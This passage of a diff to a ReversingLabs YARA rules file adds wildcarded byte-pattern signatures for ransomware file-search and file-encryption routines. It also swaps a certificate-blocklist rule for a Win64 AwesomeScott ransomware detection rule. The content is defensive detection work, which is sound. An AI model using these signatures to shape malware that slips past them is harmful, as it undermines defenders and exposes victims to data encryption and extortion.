+            ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8
+            ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
+            ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 8B 1B 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
+            58 8B 5D ?? 89 03 68 ?? ?? ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D
+            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85
+            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ??
+            B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B
+            5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 75 ?? E8
+        }
+		$find_files_p2 = {
+            83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 94 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85
+            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ??
+            B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8
+        }
+		$find_files_p3 = {
+            50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 81 7D ?? ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? FF 75 ?? 8B 5D
+            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45
+            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85
+            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0
+            75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45
+            ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 50 68 ?? ?? ?? ?? 6A ??
+            8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? A1 ?? ?? ?? ?? 50
+            FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ?? ?? ?? 0F 95 C0 89 45 ?? 8B 5D ??
+            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D
+            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45
+            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 68
+        }
+		$find_files_p4 = {
+            FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ??
+            6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? FF 75 ?? B9 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ??
+            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ??
+            ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ??
+            ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50
+        }
+		$find_files_p5 = {
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ??
+            ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? B8 ?? ??
+            ?? ?? 0F 95 C0 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ??
+            0F 84 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9
+            ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85
+            DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+		$encrypt_files_p1 = {
+            B8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 5D ?? 85 DB 74 ?? 53
+            E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
+            B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ??
+            58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ??
+            ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ??
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85
+            C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D
+        }
+		$encrypt_files_p2 = {
+            85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ??
+            ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4
+            ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ??
+            50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D
+            ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 1D ?? ?? ?? ?? 85 DB 74 ?? 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 58 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B8
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Infoteh63" and pe.signatures [ i ] . serial == "3e:72:da:f2:b9:a4:44:9e:94:60:09:e5:08:4a:8e:76" and 1591787570 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_11Edd343E21C36Ac985555D85C16135F : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Awesomescott : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AwesomeScott ransomware."
 		author = "ReversingLabs"
-		id = "219f709f-4e05-5d0e-97a4-eca1e65153a3"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "36d3b801-dbdb-585a-ac80-1827a6749c87"
+		date = "2020-09-16"
+		modified = "2020-09-16"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4050-L4066"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.AwesomeScott.yara#L1-L101"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "17feeed4be074a30572eb12fc81dc15d1b06f2d3f7b4b4fb4443391c62ac4d9b"
+		logic_hash = "ed8096a4abbd015f79f4ec7239cd4070194ad70fa03da6714e499a41f9fb9423"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "AwesomeScott"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 83 EC ??
+            45 33 FF 4C 8B F2 49 8B D8 4C 89 78 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 4C
+            89 78 ?? 4C 89 78 ?? 4C 89 78 ?? 4C 89 78 ?? B8 ?? ?? ?? ?? 48 8B F1 45 33 C9 44 8B
+            C0 8B D0 49 8B CE 45 32 ED 48 83 CD ?? 49 8B FF FF 15 ?? ?? ?? ?? 4C 8B E0 48 3B C5
+            75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8B CB 41 8D 51 ?? 45 8D 41 ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B E8 48 83 F8 ?? 75
+            ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 44 8B CB
+      }
+		$encrypt_files_p2 = {
+            44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ??
+            4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 44 8B CB 33 D2 C7 44 24 ?? ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C
+            24 ?? 48 8D 44 24 ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 0D ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 44 8B C0 45 33 C9 FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B
+            44 24 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 41 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 41 B8 ?? ?? ?? ?? 48 8D 15
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 DB 90 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 49 8B
+            CC 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ??
+            48 8B 4C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F B6 DB 0F 42 D8 48 8D 44 24
+            ?? 45 33 C9 48 89 44 24 ?? 44 0F B6 C3 33 D2 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
+      }
+		$encrypt_files_p3 = {
+            74 ?? 44 8B 44 24 ?? 4C 8D 4C 24 ?? 48 8B D7 48 8B CD 4C 89 7C 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 74 ?? 84 DB 0F 84 ?? ?? ?? ?? 41 B5 ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D
+            15 ?? ?? ?? ?? 44 8B C0 48 8B CE E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 49 8B CC FF 15 ?? ??
+            ?? ?? 48 85 ED 74 ?? 48 8B CD FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF E8 ?? ?? ??
+            ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B
+            D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
+            8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 8B
+            4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ??
+            ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ??
+            ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 48 8B 4C 24
+        }
+		$find_files = {
+            E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 F6 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ??
+            ?? 00 00 E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15
+            ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 4C 8D 44
+            24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D
+            15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
+            8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C
+            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
+            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ??
+            4C 8D 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 4C 8D 84 24 ?? ??
+            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 39 74 24 ?? 76
+            ?? 4C 8D 0D ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            48 8B CB FF 15
+      }
+
 	condition:
